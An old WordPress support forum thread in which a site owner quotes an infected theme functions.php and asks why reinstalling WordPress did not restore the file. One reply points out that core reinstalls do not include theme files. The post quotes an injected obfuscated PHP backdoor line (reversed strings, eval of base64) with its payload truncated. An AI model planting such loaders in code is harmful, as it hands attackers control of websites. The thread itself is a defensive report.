functions.php missing after reinstall

  • rossmcm

    (@rossmcm)


    10 years, 2 months ago

    The plug-in antivirus for wordpress reported an infection today in the file /themes/default/functions.php on my site. Inspection of the file showed the following differences when compared with the most recent snapshot I took of the file:

    Line 1:

    <?php

    replaced with:

    <?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); $wp_function_initialize(strrev(';))"=oQD9p.....nZoYWa"(edoced_46esab(lave'));?><?php

    Last routine in the file:

    <?php
add_filter( 'the_password_form', 'custom_password_form' );
function custom_password_form() {
	global $post;
	$label = 'pwbox-'.( empty( $post->ID ) ? rand() : $post->ID );
	$o = '<form class="protected-post-form" action="' . get_option('siteurl') . '/wp-pass.php" method="post">
	' . __( "This page is password protected. To view it please enter your password below: <br /><br />" ) . '
	<label for="' . $label . '">' . __( "Password:" ) . ' </label><input name="post_password" id="' . $label . '" type="password" size="20" /><input type="submit" name="Submit" value="' . esc_attr__( "Submit" ) . '" />
	</form>
	';
	return $o;
}
?>

    replaced with

    <?php
add_filter( 'the_password_form', 'custom_password_form' );
function custom_password_form() {
	global $post;
	$label = 'pwbox-'.( empty( $post->ID ) ? rand() : $post->ID );
	$o = '<form class="protected-post-form" action="' . get_option('siteurl') . '/wp-login.php?action=postpass" method="post">
	' . __( "This page is password protected. To view it please enter your password below: <br /><br />" ) . '
	<label for="' . $label . '">' . __( "Password:" ) . ' </label><input name="post_password" id="' . $label . '" type="password" size="20" /><input type="submit" name="Submit" value="' . esc_attr__( "Submit" ) . '" />
	</form>
	';
	return $o;
}
?>

    I took the following steps:

    – renamed the offending file to functions (hacked).ph_
    – reinstalled WP 3.8.1

    The site now scans without reporting any problems and seems to run OK, but the file functions.php is nowhere to be seen! Shouldn’t a reinstall have replaced the file? Or has that file been eliminated in the update?

    I had a similar problem a month or so back, and it turned out that the file in question (called jquery.php) wasn’t part of WP at all, but I’m pretty sure that functions.php is a genuine file and part of WP (or was anyway).

    Can anyone enlighten me as to what is going on here?

Viewing 1 replies (of 1 total)
  • webbrewers

    (@webbrewers)

    10 years, 2 months ago

    reported an infection today in the file /themes/default/functions.php

    I don’t think WP 3.8.1 would include a theme file.

Viewing 1 replies (of 1 total)
  • The topic ‘functions.php missing after reinstall’ is closed to new replies.

Tags